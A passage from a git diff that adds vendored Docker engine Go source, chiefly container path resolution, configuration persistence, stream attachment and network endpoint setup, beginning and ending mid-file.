panicFile, err = os.Create(path) + if err != nil { + return err + } + } + + // Update STD_ERROR_HANDLE to point to the panic file so that Go writes to + // it when it panics. Remember the old stderr to restore it before removing + // the panic file. + sh := syscall.STD_ERROR_HANDLE + h, err := syscall.GetStdHandle(sh) + if err != nil { + return err + } + + oldStderr = h + + r, _, err := setStdHandle.Call(uintptr(sh), uintptr(panicFile.Fd())) + if r == 0 && err != nil { + return err + } + + return nil +} + +func removePanicFile() { + if st, err := panicFile.Stat(); err == nil { + if st.Size() == 0 { + sh := syscall.STD_ERROR_HANDLE + setStdHandle.Call(uintptr(sh), uintptr(oldStderr)) + panicFile.Close() + os.Remove(panicFile.Name()) + } + } +} diff --git a/vendor/github.com/docker/docker/container/archive.go b/vendor/github.com/docker/docker/container/archive.go new file mode 100644 index 0000000000..56e6598b9c --- /dev/null +++ b/vendor/github.com/docker/docker/container/archive.go @@ -0,0 +1,76 @@ +package container + +import ( + "os" + "path/filepath" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/system" +) + +// ResolvePath resolves the given path in the container to a resource on the +// host. Returns a resolved path (absolute path to the resource on the host), +// the absolute path to the resource relative to the container's rootfs, and +// an error if the path points to outside the container's rootfs. +func (container *Container) ResolvePath(path string) (resolvedPath, absPath string, err error) { + // Check if a drive letter supplied, it must be the system drive. No-op except on Windows + path, err = system.CheckSystemDriveAndRemoveDriveLetter(path) + if err != nil { + return "", "", err + } + + // Consider the given path as an absolute path in the container. + absPath = archive.PreserveTrailingDotOrSeparator(filepath.Join(string(filepath.Separator), path), path) + + // Split the absPath into its Directory and Base components. We will + // resolve the dir in the scope of the container then append the base. + dirPath, basePath := filepath.Split(absPath) + + resolvedDirPath, err := container.GetResourcePath(dirPath) + if err != nil { + return "", "", err + } + + // resolvedDirPath will have been cleaned (no trailing path separators) so + // we can manually join it with the base path element. + resolvedPath = resolvedDirPath + string(filepath.Separator) + basePath + + return resolvedPath, absPath, nil +} + +// StatPath is the unexported version of StatPath. Locks and mounts should +// be acquired before calling this method and the given path should be fully +// resolved to a path on the host corresponding to the given absolute path +// inside the container. +func (container *Container) StatPath(resolvedPath, absPath string) (stat *types.ContainerPathStat, err error) { + lstat, err := os.Lstat(resolvedPath) + if err != nil { + return nil, err + } + + var linkTarget string + if lstat.Mode()&os.ModeSymlink != 0 { + // Fully evaluate the symlink in the scope of the container rootfs. + hostPath, err := container.GetResourcePath(absPath) + if err != nil { + return nil, err + } + + linkTarget, err = filepath.Rel(container.BaseFS, hostPath) + if err != nil { + return nil, err + } + + // Make it an absolute path. + linkTarget = filepath.Join(string(filepath.Separator), linkTarget) + } + + return &types.ContainerPathStat{ + Name: filepath.Base(absPath), + Size: lstat.Size(), + Mode: lstat.Mode(), + Mtime: lstat.ModTime(), + LinkTarget: linkTarget, + }, nil +} diff --git a/vendor/github.com/docker/docker/container/container.go b/vendor/github.com/docker/docker/container/container.go new file mode 100644 index 0000000000..fc4fe2717f --- /dev/null +++ b/vendor/github.com/docker/docker/container/container.go @@ -0,0 +1,1103 @@ +package container + +import ( + "encoding/json" + "fmt" + "io" + "net" + "os" + "path/filepath" + "strconv" + "strings" + "sync" + "syscall" + "time" + + "golang.org/x/net/context" + + "github.com/Sirupsen/logrus" + containertypes "github.com/docker/docker/api/types/container" + mounttypes "github.com/docker/docker/api/types/mount" + networktypes "github.com/docker/docker/api/types/network" + swarmtypes "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/container/stream" + "github.com/docker/docker/daemon/exec" + "github.com/docker/docker/daemon/logger" + "github.com/docker/docker/daemon/logger/jsonfilelog" + "github.com/docker/docker/daemon/network" + "github.com/docker/docker/image" + "github.com/docker/docker/layer" + "github.com/docker/docker/libcontainerd" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/promise" + "github.com/docker/docker/pkg/signal" + "github.com/docker/docker/pkg/symlink" + "github.com/docker/docker/restartmanager" + "github.com/docker/docker/runconfig" + runconfigopts "github.com/docker/docker/runconfig/opts" + "github.com/docker/docker/volume" + "github.com/docker/go-connections/nat" + "github.com/docker/libnetwork" + "github.com/docker/libnetwork/netlabel" + "github.com/docker/libnetwork/options" + "github.com/docker/libnetwork/types" + agentexec "github.com/docker/swarmkit/agent/exec" + "github.com/opencontainers/runc/libcontainer/label" +) + +const configFileName = "config.v2.json" + +const ( + // DefaultStopTimeout is the timeout (in seconds) for the syscall signal used to stop a container. + DefaultStopTimeout = 10 +) + +var ( + errInvalidEndpoint = fmt.Errorf("invalid endpoint while building port map info") + errInvalidNetwork = fmt.Errorf("invalid network settings while building port map info") +) + +// DetachError is special error which returned in case of container detach. +type DetachError struct{} + +func (DetachError) Error() string { + return "detached from container" +} + +// CommonContainer holds the fields for a container which are +// applicable across all platforms supported by the daemon. +type CommonContainer struct { + StreamConfig *stream.Config + // embed for Container to support states directly. + *State `json:"State"` // Needed for Engine API version <= 1.11 + Root string `json:"-"` // Path to the "home" of the container, including metadata. + BaseFS string `json:"-"` // Path to the graphdriver mountpoint + RWLayer layer.RWLayer `json:"-"` + ID string + Created time.Time + Managed bool + Path string + Args []string + Config *containertypes.Config + ImageID image.ID `json:"Image"` + NetworkSettings *network.Settings + LogPath string + Name string + Driver string + // MountLabel contains the options for the 'mount' command + MountLabel string + ProcessLabel string + RestartCount int + HasBeenStartedBefore bool + HasBeenManuallyStopped bool // used for unless-stopped restart policy + MountPoints map[string]*volume.MountPoint + HostConfig *containertypes.HostConfig `json:"-"` // do not serialize the host config in the json, otherwise we'll make the container unportable + ExecCommands *exec.Store `json:"-"` + SecretStore agentexec.SecretGetter `json:"-"` + SecretReferences []*swarmtypes.SecretReference + // logDriver for closing + LogDriver logger.Logger `json:"-"` + LogCopier *logger.Copier `json:"-"` + restartManager restartmanager.RestartManager + attachContext *attachContext +} + +// NewBaseContainer creates a new container with its +// basic configuration. +func NewBaseContainer(id, root string) *Container { + return &Container{ + CommonContainer: CommonContainer{ + ID: id, + State: NewState(), + ExecCommands: exec.NewStore(), + Root: root, + MountPoints: make(map[string]*volume.MountPoint), + StreamConfig: stream.NewConfig(), + attachContext: &attachContext{}, + }, + } +} + +// FromDisk loads the container configuration stored in the host. +func (container *Container) FromDisk() error { + pth, err := container.ConfigPath() + if err != nil { + return err + } + + jsonSource, err := os.Open(pth) + if err != nil { + return err + } + defer jsonSource.Close() + + dec := json.NewDecoder(jsonSource) + + // Load container settings + if err := dec.Decode(container); err != nil { + return err + } + + if err := label.ReserveLabel(container.ProcessLabel); err != nil { + return err + } + return container.readHostConfig() +} + +// ToDisk saves the container configuration on disk. +func (container *Container) ToDisk() error { + pth, err := container.ConfigPath() + if err != nil { + return err + } + + jsonSource, err := ioutils.NewAtomicFileWriter(pth, 0644) + if err != nil { + return err + } + defer jsonSource.Close() + + enc := json.NewEncoder(jsonSource) + + // Save container settings + if err := enc.Encode(container); err != nil { + return err + } + + return container.WriteHostConfig() +} + +// ToDiskLocking saves the container configuration on disk in a thread safe way. +func (container *Container) ToDiskLocking() error { + container.Lock() + err := container.ToDisk() + container.Unlock() + return err +} + +// readHostConfig reads the host configuration from disk for the container. +func (container *Container) readHostConfig() error { + container.HostConfig = &containertypes.HostConfig{} + // If the hostconfig file does not exist, do not read it. + // (We still have to initialize container.HostConfig, + // but that's OK, since we just did that above.) + pth, err := container.HostConfigPath() + if err != nil { + return err + } + + f, err := os.Open(pth) + if err != nil { + if os.IsNotExist(err) { + return nil + } + return err + } + defer f.Close() + + if err := json.NewDecoder(f).Decode(&container.HostConfig); err != nil { + return err + } + + container.InitDNSHostConfig() + + return nil +} + +// WriteHostConfig saves the host configuration on disk for the container. +func (container *Container) WriteHostConfig() error { + pth, err := container.HostConfigPath() + if err != nil { + return err + } + + f, err := ioutils.NewAtomicFileWriter(pth, 0644) + if err != nil { + return err + } + defer f.Close() + + return json.NewEncoder(f).Encode(&container.HostConfig) +} + +// SetupWorkingDirectory sets up the container's working directory as set in container.Config.WorkingDir +func (container *Container) SetupWorkingDirectory(rootUID, rootGID int) error { + if container.Config.WorkingDir == "" { + return nil + } + + container.Config.WorkingDir = filepath.Clean(container.Config.WorkingDir) + + pth, err := container.GetResourcePath(container.Config.WorkingDir) + if err != nil { + return err + } + + if err := idtools.MkdirAllNewAs(pth, 0755, rootUID, rootGID); err != nil { + pthInfo, err2 := os.Stat(pth) + if err2 == nil && pthInfo != nil && !pthInfo.IsDir() { + return fmt.Errorf("Cannot mkdir: %s is not a directory", container.Config.WorkingDir) + } + + return err + } + + return nil +} + +// GetResourcePath evaluates `path` in the scope of the container's BaseFS, with proper path +// sanitisation. Symlinks are all scoped to the BaseFS of the container, as +// though the container's BaseFS was `/`. +// +// The BaseFS of a container is the host-facing path which is bind-mounted as +// `/` inside the container. This method is essentially used to access a +// particular path inside the container as though you were a process in that +// container. +// +// NOTE: The returned path is *only* safely scoped inside the container's BaseFS +// if no component of the returned path changes (such as a component +// symlinking to a different path) between using this method and using the +// path. See symlink.FollowSymlinkInScope for more details. +func (container *Container) GetResourcePath(path string) (string, error) { + // IMPORTANT - These are paths on the OS where the daemon is running, hence + // any filepath operations must be done in an OS agnostic way. + + cleanPath := cleanResourcePath(path) + r, e := symlink.FollowSymlinkInScope(filepath.Join(container.BaseFS, cleanPath), container.BaseFS) + + // Log this here on the daemon side as there's otherwise no indication apart + // from the error being propagated all the way back to the client. This makes + // debugging significantly easier and clearly indicates the error comes from the daemon. + if e != nil { + logrus.Errorf("Failed to FollowSymlinkInScope BaseFS %s cleanPath %s path %s %s\n", container.BaseFS, cleanPath, path, e) + } + return r, e +} + +// GetRootResourcePath evaluates `path` in the scope of the container's root, with proper path +// sanitisation. Symlinks are all scoped to the root of the container, as +// though the container's root was `/`. +// +// The root of a container is the host-facing configuration metadata directory. +// Only use this method to safely access the container's `container.json` or +// other metadata files. If in doubt, use container.GetResourcePath. +// +// NOTE: The returned path is *only* safely scoped inside the container's root +// if no component of the returned path changes (such as a component +// symlinking to a different path) between using this method and using the +// path. See symlink.FollowSymlinkInScope for more details. +func (container *Container) GetRootResourcePath(path string) (string, error) { + // IMPORTANT - These are paths on the OS where the daemon is running, hence + // any filepath operations must be done in an OS agnostic way. + cleanPath := filepath.Join(string(os.PathSeparator), path) + return symlink.FollowSymlinkInScope(filepath.Join(container.Root, cleanPath), container.Root) +} + +// ExitOnNext signals to the monitor that it should not restart the container +// after we send the kill signal. +func (container *Container) ExitOnNext() { + container.RestartManager().Cancel() +} + +// HostConfigPath returns the path to the container's JSON hostconfig +func (container *Container) HostConfigPath() (string, error) { + return container.GetRootResourcePath("hostconfig.json") +} + +// ConfigPath returns the path to the container's JSON config +func (container *Container) ConfigPath() (string, error) { + return container.GetRootResourcePath(configFileName) +} + +// CheckpointDir returns the directory checkpoints are stored in +func (container *Container) CheckpointDir() string { + return filepath.Join(container.Root, "checkpoints") +} + +// StartLogger starts a new logger driver for the container. +func (container *Container) StartLogger(cfg containertypes.LogConfig) (logger.Logger, error) { + c, err := logger.GetLogDriver(cfg.Type) + if err != nil { + return nil, fmt.Errorf("Failed to get logging factory: %v", err) + } + ctx := logger.Context{ + Config: cfg.Config, + ContainerID: container.ID, + ContainerName: container.Name, + ContainerEntrypoint: container.Path, + ContainerArgs: container.Args, + ContainerImageID: container.ImageID.String(), + ContainerImageName: container.Config.Image, + ContainerCreated: container.Created, + ContainerEnv: container.Config.Env, + ContainerLabels: container.Config.Labels, + DaemonName: "docker", + } + + // Set logging file for "json-logger" + if cfg.Type == jsonfilelog.Name { + ctx.LogPath, err = container.GetRootResourcePath(fmt.Sprintf("%s-json.log", container.ID)) + if err != nil { + return nil, err + } + } + return c(ctx) +} + +// GetProcessLabel returns the process label for the container. +func (container *Container) GetProcessLabel() string { + // even if we have a process label return "" if we are running + // in privileged mode + if container.HostConfig.Privileged { + return "" + } + return container.ProcessLabel +} + +// GetMountLabel returns the mounting label for the container. +// This label is empty if the container is privileged. +func (container *Container) GetMountLabel() string { + return container.MountLabel +} + +// GetExecIDs returns the list of exec commands running on the container. +func (container *Container) GetExecIDs() []string { + return container.ExecCommands.List() +} + +// Attach connects to the container's TTY, delegating to standard +// streams or websockets depending on the configuration. +func (container *Container) Attach(stdin io.ReadCloser, stdout io.Writer, stderr io.Writer, keys []byte) chan error { + ctx := container.InitAttachContext() + return AttachStreams(ctx, container.StreamConfig, container.Config.OpenStdin, container.Config.StdinOnce, container.Config.Tty, stdin, stdout, stderr, keys) +} + +// AttachStreams connects streams to a TTY. +// Used by exec too. Should this move somewhere else? +func AttachStreams(ctx context.Context, streamConfig *stream.Config, openStdin, stdinOnce, tty bool, stdin io.ReadCloser, stdout io.Writer, stderr io.Writer, keys []byte) chan error { + var ( + cStdout, cStderr io.ReadCloser + cStdin io.WriteCloser + wg sync.WaitGroup + errors = make(chan error, 3) + ) + + if stdin != nil && openStdin { + cStdin = streamConfig.StdinPipe() + wg.Add(1) + } + + if stdout != nil { + cStdout = streamConfig.StdoutPipe() + wg.Add(1) + } + + if stderr != nil { + cStderr = streamConfig.StderrPipe() + wg.Add(1) + } + + // Connect stdin of container to the http conn. + go func() { + if stdin == nil || !openStdin { + return + } + logrus.Debug("attach: stdin: begin") + + var err error + if tty { + _, err = copyEscapable(cStdin, stdin, keys) + } else { + _, err = io.Copy(cStdin, stdin) + } + if err == io.ErrClosedPipe { + err = nil + } + if err != nil { + logrus.Errorf("attach: stdin: %s", err) + errors <- err + } + if stdinOnce && !tty { + cStdin.Close() + } else { + // No matter what, when stdin is closed (io.Copy unblock), close stdout and stderr + if cStdout != nil { + cStdout.Close() + } + if cStderr != nil { + cStderr.Close() + } + } + logrus.Debug("attach: stdin: end") + wg.Done() + }() + + attachStream := func(name string, stream io.Writer, streamPipe io.ReadCloser) { + if stream == nil { + return + } + + logrus.Debugf("attach: %s: begin", name) + _, err := io.Copy(stream, streamPipe) + if err == io.ErrClosedPipe { + err = nil + } + if err != nil { + logrus.Errorf("attach: %s: %v", name, err) + errors <- err + } + // Make sure stdin gets closed + if stdin != nil { + stdin.Close() + } + streamPipe.Close() + logrus.Debugf("attach: %s: end", name) + wg.Done() + } + + go attachStream("stdout", stdout, cStdout) + go attachStream("stderr", stderr, cStderr) + + return promise.Go(func() error { + done := make(chan struct{}) + go func() { + wg.Wait() + close(done) + }() + select { + case <-done: + case <-ctx.Done(): + // close all pipes + if cStdin != nil { + cStdin.Close() + } + if cStdout != nil { + cStdout.Close() + } + if cStderr != nil { + cStderr.Close() + } + <-done + } + close(errors) + for err := range errors { + if err != nil { + return err + } + } + return nil + }) +} + +// Code c/c from io.Copy() modified to handle escape sequence +func copyEscapable(dst io.Writer, src io.ReadCloser, keys []byte) (written int64, err error) { + if len(keys) == 0 { + // Default keys : ctrl-p ctrl-q + keys = []byte{16, 17} + } + buf := make([]byte, 32*1024) + for { + nr, er := src.Read(buf) + if nr > 0 { + // ---- Docker addition + preservBuf := []byte{} + for i, key := range keys { + preservBuf = append(preservBuf, buf[0:nr]...) + if nr != 1 || buf[0] != key { + break + } + if i == len(keys)-1 { + src.Close() + return 0, DetachError{} + } + nr, er = src.Read(buf) + } + var nw int + var ew error + if len(preservBuf) > 0 { + nw, ew = dst.Write(preservBuf) + nr = len(preservBuf) + } else { + // ---- End of docker + nw, ew = dst.Write(buf[0:nr]) + } + if nw > 0 { + written += int64(nw) + } + if ew != nil { + err = ew + break + } + if nr != nw { + err = io.ErrShortWrite + break + } + } + if er == io.EOF { + break + } + if er != nil { + err = er + break + } + } + return written, err +} + +// ShouldRestart decides whether the daemon should restart the container or not. +// This is based on the container's restart policy. +func (container *Container) ShouldRestart() bool { + shouldRestart, _, _ := container.RestartManager().ShouldRestart(uint32(container.ExitCode()), container.HasBeenManuallyStopped, container.FinishedAt.Sub(container.StartedAt)) + return shouldRestart +} + +// AddMountPointWithVolume adds a new mount point configured with a volume to the container. +func (container *Container) AddMountPointWithVolume(destination string, vol volume.Volume, rw bool) { + container.MountPoints[destination] = &volume.MountPoint{ + Type: mounttypes.TypeVolume, + Name: vol.Name(), + Driver: vol.DriverName(), + Destination: destination, + RW: rw, + Volume: vol, + CopyData: volume.DefaultCopyMode, + } +} + +// UnmountVolumes unmounts all volumes +func (container *Container) UnmountVolumes(volumeEventLog func(name, action string, attributes map[string]string)) error { + var errors []string + for _, volumeMount := range container.MountPoints { + // Check if the mounpoint has an ID, this is currently the best way to tell if it's actually mounted + // TODO(cpuguyh83): there should be a better way to handle this + if volumeMount.Volume != nil && volumeMount.ID != "" { + if err := volumeMount.Volume.Unmount(volumeMount.ID); err != nil { + errors = append(errors, err.Error()) + continue + } + volumeMount.ID = "" + + attributes := map[string]string{ + "driver": volumeMount.Volume.DriverName(), + "container": container.ID, + } + volumeEventLog(volumeMount.Volume.Name(), "unmount", attributes) + } + } + if len(errors) > 0 { + return fmt.Errorf("error while unmounting volumes for container %s: %s", container.ID, strings.Join(errors, "; ")) + } + return nil +} + +// IsDestinationMounted checks whether a path is mounted on the container or not. +func (container *Container) IsDestinationMounted(destination string) bool { + return container.MountPoints[destination] != nil +} + +// StopSignal returns the signal used to stop the container. +func (container *Container) StopSignal() int { + var stopSignal syscall.Signal + if container.Config.StopSignal != "" { + stopSignal, _ = signal.ParseSignal(container.Config.StopSignal) + } + + if int(stopSignal) == 0 { + stopSignal, _ = signal.ParseSignal(signal.DefaultStopSignal) + } + return int(stopSignal) +} + +// StopTimeout returns the timeout (in seconds) used to stop the container. +func (container *Container) StopTimeout() int { + if container.Config.StopTimeout != nil { + return *container.Config.StopTimeout + } + return DefaultStopTimeout +} + +// InitDNSHostConfig ensures that the dns fields are never nil. +// New containers don't ever have those fields nil, +// but pre created containers can still have those nil values. +// The non-recommended host configuration in the start api can +// make these fields nil again, this corrects that issue until +// we remove that behavior for good. +// See https://github.com/docker/docker/pull/17779 +// for a more detailed explanation on why we don't want that. +func (container *Container) InitDNSHostConfig() { + container.Lock() + defer container.Unlock() + if container.HostConfig.DNS == nil { + container.HostConfig.DNS = make([]string, 0) + } + + if container.HostConfig.DNSSearch == nil { + container.HostConfig.DNSSearch = make([]string, 0) + } + + if container.HostConfig.DNSOptions == nil { + container.HostConfig.DNSOptions = make([]string, 0) + } +} + +// GetEndpointInNetwork returns the container's endpoint to the provided network. +func (container *Container) GetEndpointInNetwork(n libnetwork.Network) (libnetwork.Endpoint, error) { + endpointName := strings.TrimPrefix(container.Name, "/") + return n.EndpointByName(endpointName) +} + +func (container *Container) buildPortMapInfo(ep libnetwork.Endpoint) error { + if ep == nil { + return errInvalidEndpoint + } + + networkSettings := container.NetworkSettings + if networkSettings == nil { + return errInvalidNetwork + } + + if len(networkSettings.Ports) == 0 { + pm, err := getEndpointPortMapInfo(ep) + if err != nil { + return err + } + networkSettings.Ports = pm + } + return nil +} + +func getEndpointPortMapInfo(ep libnetwork.Endpoint) (nat.PortMap, error) { + pm := nat.PortMap{} + driverInfo, err := ep.DriverInfo() + if err != nil { + return pm, err + } + + if driverInfo == nil { + // It is not an error for epInfo to be nil + return pm, nil + } + + if expData, ok := driverInfo[netlabel.ExposedPorts]; ok { + if exposedPorts, ok := expData.([]types.TransportPort); ok { + for _, tp := range exposedPorts { + natPort, err := nat.NewPort(tp.Proto.String(), strconv.Itoa(int(tp.Port))) + if err != nil { + return pm, fmt.Errorf("Error parsing Port value(%v):%v", tp.Port, err) + } + pm[natPort] = nil + } + } + } + + mapData, ok := driverInfo[netlabel.PortMap] + if !ok { + return pm, nil + } + + if portMapping, ok := mapData.([]types.PortBinding); ok { + for _, pp := range portMapping { + natPort, err := nat.NewPort(pp.Proto.String(), strconv.Itoa(int(pp.Port))) + if err != nil { + return pm, err + } + natBndg := nat.PortBinding{HostIP: pp.HostIP.String(), HostPort: strconv.Itoa(int(pp.HostPort))} + pm[natPort] = append(pm[natPort], natBndg) + } + } + + return pm, nil +} + +// GetSandboxPortMapInfo retrieves the current port-mapping programmed for the given sandbox +func GetSandboxPortMapInfo(sb libnetwork.Sandbox) nat.PortMap { + pm := nat.PortMap{} + if sb == nil { + return pm + } + + for _, ep := range sb.Endpoints() { + pm, _ = getEndpointPortMapInfo(ep) + if len(pm) > 0 { + break + } + } + return pm +} + +// BuildEndpointInfo sets endpoint-related fields on container.NetworkSettings based on the provided network and endpoint. +func (container *Container) BuildEndpointInfo(n libnetwork.Network, ep libnetwork.Endpoint) error { + if ep == nil { + return errInvalidEndpoint + } + + networkSettings := container.NetworkSettings + if networkSettings == nil { + return errInvalidNetwork + } + + epInfo := ep.Info() + if epInfo == nil { + // It is not an error to get an empty endpoint info + return nil + } + + if _, ok := networkSettings.Networks[n.Name()]; !ok { + networkSettings.Networks[n.Name()] = &network.EndpointSettings{ + EndpointSettings: &networktypes.EndpointSettings{}, + } + } + networkSettings.Networks[n.Name()].NetworkID = n.ID() + networkSettings.Networks[n.Name()].EndpointID = ep.ID() + + iface := epInfo.Iface() + if iface == nil { + return nil + } + + if iface.MacAddress() != nil { + networkSettings.Networks[n.Name()].MacAddress = iface.MacAddress().String() + } + + if iface.Address() != nil { + ones, _ := iface.Address().Mask.Size() + networkSettings.Networks[n.Name()].IPAddress = iface.Address().IP.String() + networkSettings.Networks[n.Name()].IPPrefixLen = ones + } + + if iface.AddressIPv6() != nil && iface.AddressIPv6().IP.To16() != nil { + onesv6, _ := iface.AddressIPv6().Mask.Size() + networkSettings.Networks[n.Name()].GlobalIPv6Address = iface.AddressIPv6().IP.String() + networkSettings.Networks[n.Name()].GlobalIPv6PrefixLen = onesv6 + } + + return nil +} + +// UpdateJoinInfo updates network settings when container joins network n with endpoint ep. +func (container *Container) UpdateJoinInfo(n libnetwork.Network, ep libnetwork.Endpoint) error { + if err := container.buildPortMapInfo(ep); err != nil { + return err + } + + epInfo := ep.Info() + if epInfo == nil { + // It is not an error to get an empty endpoint info + return nil + } + if epInfo.Gateway() != nil { + container.NetworkSettings.Networks[n.Name()].Gateway = epInfo.Gateway().String() + } + if epInfo.GatewayIPv6().To16() != nil { + container.NetworkSettings.Networks[n.Name()].IPv6Gateway = epInfo.GatewayIPv6().String() + } + + return nil +} + +// UpdateSandboxNetworkSettings updates the sandbox ID and Key. +func (container *Container) UpdateSandboxNetworkSettings(sb libnetwork.Sandbox) error { + container.NetworkSettings.SandboxID = sb.ID() + container.NetworkSettings.SandboxKey = sb.Key() + return nil +} + +// BuildJoinOptions builds endpoint Join options from a given network. +func (container *Container) BuildJoinOptions(n libnetwork.Network) ([]libnetwork.EndpointOption, error) { + var joinOptions []libnetwork.EndpointOption + if epConfig, ok := container.NetworkSettings.Networks[n.Name()]; ok { + for _, str := range epConfig.Links { + name, alias, err := runconfigopts.ParseLink(str) + if err != nil { + return nil, err + } + joinOptions = append(joinOptions, libnetwork.CreateOptionAlias(name, alias)) + } + } + return joinOptions, nil +} + +// BuildCreateEndpointOptions builds endpoint options from a given network. +func (container *Container) BuildCreateEndpointOptions(n libnetwork.Network, epConfig *networktypes.EndpointSettings, sb libnetwork.Sandbox, daemonDNS []string) ([]libnetwork.EndpointOption, error) { + var ( + bindings = make(nat.PortMap) + pbList []types.PortBinding + exposeList []types.TransportPort + createOptions []libnetwork.EndpointOption + ) + + defaultNetName := runconfig.DefaultDaemonNetworkMode().NetworkName() + + if (!container.EnableServiceDiscoveryOnDefaultNetwork() && n.Name() == defaultNetName) || + container.NetworkSettings.IsAnonymousEndpoint { + createOptions = append(createOptions, libnetwork.CreateOptionAnonymous()) + } + + if epConfig != nil { + ipam := epConfig.IPAMConfig + if ipam != nil && (ipam.IPv4Address != "" || ipam.IPv6Address != "" || len(ipam.LinkLocalIPs) > 0) { + var ipList []net.IP + for _, ips := range ipam.LinkLocalIPs { + if ip := net.ParseIP(ips); ip != nil { + ipList = append(ipList, ip) + } + } + createOptions = append(createOptions, + libnetwork.CreateOptionIpam(net.ParseIP(ipam.IPv4Address), net.ParseIP(ipam.IPv6Address), ipList, nil)) + } + + for _, alias := range epConfig.Aliases { + createOptions = append(createOptions, libnetwork.CreateOptionMyAlias(alias)) + } + } + + if container.NetworkSettings.Service != nil { + svcCfg := container.NetworkSettings.Service + + var vip string + if svcCfg.VirtualAddresses[n.ID()] != nil { + vip = svcCfg.VirtualAddresses[n.ID()].IPv4 + } + + var portConfigs []*libnetwork.PortConfig + for _, portConfig := range svcCfg.ExposedPorts { + portConfigs = append(portConfigs, &libnetwork.PortConfig{ + Name: portConfig.Name, + Protocol: libnetwork.PortConfig_Protocol(portConfig.Protocol), + TargetPort: portConfig.TargetPort, + PublishedPort: portConfig.PublishedPort, + }) + } + + createOptions = append(createOptions, libnetwork.CreateOptionService(svcCfg.Name, svcCfg.ID, net.ParseIP(vip), portConfigs, svcCfg.Aliases[n.ID()])) + } + + if !containertypes.NetworkMode(n.Name()).IsUserDefined() { + createOptions = append(createOptions, libnetwork.CreateOptionDisableResolution()) + } + + // configs that are applicable only for the endpoint in the network + // to which container was connected to on docker run. + // Ideally all these network-specific endpoint configurations must be moved under + // container.NetworkSettings.Networks[n.Name()] + if n.Name() == container.HostConfig.NetworkMode.NetworkName() || + (n.Name() == defaultNetName && container.HostConfig.NetworkMode.IsDefault()) { + if container.Config.MacAddress != "" { + mac, err := net.ParseMAC(container.Config.MacAddress) + if err != nil { + return nil, err + } + + genericOption := options.Generic{ + netlabel.MacAddress: mac, + } + + createOptions = append(createOptions, libnetwork.EndpointOptionGeneric(genericOption)) + } + } + + // Port-mapping rules belong to the container & applicable only to non-internal networks + portmaps := GetSandboxPortMapInfo(sb) + if n.Info().Internal() || len(portmaps) > 0 { + return createOptions, nil + } + + if container.HostConfig.PortBindings != nil { + for p, b := range container.HostConfig.PortBindings { + bindings[p] = []nat.PortBinding{} + for _, bb := range b { + bindings[p] = append(bindings[p], nat.PortBinding{ + HostIP: bb.HostIP, + HostPort: bb.HostPort, + }) + } + } + } + + portSpecs := container.Config.ExposedPorts + ports := make([]nat.Port, len(portSpecs)) + var i int + for p := range portSpecs { + ports[i] = p + i++ + } + nat.SortPortMap(ports, bindings) + for _, port := range ports { + expose := types.TransportPort{} + expose.Proto = types.ParseProtocol(port.Proto()) + expose.Port = uint16(port.Int()) + exposeList = append(exposeList, expose) + + pb := types.PortBinding{Port: expose.Port, Proto: expose.Proto} + binding := bindings[port] + for i := 0; i < len(binding); i++ { + pbCopy := pb.GetCopy() + newP, err := nat.NewPort(nat.SplitProtoPort(binding[i].HostPort)) + var portStart, portEnd int + if err == nil { + portStart, portEnd, err = newP.Range() + } + if err != nil { + return nil, fmt.Errorf("Error parsing HostPort value(%s):%v", binding[i].HostPort, err) + } + pbCopy.HostPort = uint16(portStart) + pbCopy.HostPortEnd = uint16(portEnd) + pbCopy.HostIP = net.ParseIP(binding[i].HostIP) + pbList = append(pbList, pbCopy) + } + + if container.HostConfig.PublishAllPorts && len(binding) == 0 { + pbList = append(pbList, pb) + } + } + + var dns []string + + if len(container.HostConfig.DNS) > 0 { + dns = container.HostConfig.DNS + } else if len(daemonDNS) > 0 { + dns = daemonDNS + } + + if len(dns) > 0 { + createOptions = append(createOptions, + libnetwork.CreateOptionDNS(dns)) + } + + createOptions = append(createOptions, + libnetwork.CreateOptionPortMapping(pbList), + libnetwork.CreateOptionExposedPorts(exposeList)) + + return createOptions, nil +} + +// UpdateMonitor updates monitor configure for running container +func (container *Container) UpdateMonitor(restartPolicy containertypes.RestartPolicy) { + type policySetter interface { + SetPolicy(containertypes.RestartPolicy) + } + + if rm, ok := container.RestartManager().(policySetter); ok { + rm.SetPolicy(restartPolicy) + } +} + +// FullHostname returns hostname and optional domain appended to it. +func (container *Container) FullHostname() string { + fullHostname := container.Config.Hostname + if container.Config.Domainname != "" { + fullHostname = fmt.Sprintf("%s.%s", fullHostname, container.Config.Domainname) + } + return fullHostname +} + +// RestartManager returns the current restartmanager instance connected to container. +func (container *Container) RestartManager() restartmanager.RestartManager { + if container.restartManager == nil { + container.restartManager = restartmanager.New(container.HostConfig.RestartPolicy, container.RestartCount) + } + return container.restartManager +} + +// ResetRestartManager initializes new restartmanager based on container config +func (container *Container) ResetRestartManager(resetCount bool) { + if container.restartManager != nil { + container.restartManager.Cancel() + } + if resetCount { + container.RestartCount = 0 + } + container.restartManager = nil +} + +type attachContext struct { + ctx context.Context + cancel context.CancelFunc + mu sync.Mutex +} + +// InitAttachContext initializes or returns existing context for attach calls to +// track container liveness. +func (container *Container) InitAttachContext() context.Context { + container.attachContext.mu.Lock() + defer container.attachContext.mu.Unlock() + if container.attachContext.ctx == nil { + container.attachContext.ctx, container.attachContext.cancel = context.WithCancel(context.Background()) + } + return container.attachContext.ctx +} + +// CancelAttachContext cancels attach context. All attach calls should detach +// after this call. +func (container *Container) CancelAttachContext() { + container.attachContext.mu.Lock() + if container.attachContext.ctx != nil { + container.attachContext.cancel() + container.attachContext.ctx = nil + } + container.attachContext.mu.Unlock() +} + +func (container *Container) startLogging() error { + if container.HostConfig.LogConfig.Type == "none" { + return nil // do not start logging routines + } + + l, err := container.StartLogger(container.HostConfig.LogConfig) + if err != nil { + return fmt.Errorf("Failed to initialize logging driver: %v", err) + } + + copier := logger.NewCopier(map[string]io.Reader{"stdout": container.StdoutPipe(), "stderr": container.StderrPipe()}, l) + container.LogCopier = copier + copier.Run() + container.LogDriver = l + + // set LogPath field only for json-file logdriver + if jl, ok := l.(*jsonfilelog.JSONFileLogger); ok { + container.LogPath = jl.LogPath() + } + + return nil +} + +// StdinPipe gets the stdin stream of the container +func (container *Container) StdinPipe() io.WriteCloser { + return container.StreamConfig.StdinPipe() +} + +// StdoutPipe gets the stdout stream of the container +func (container *Container) StdoutPipe() io.ReadCloser { + return container.StreamConfig.StdoutPipe() +} + +// StderrPipe 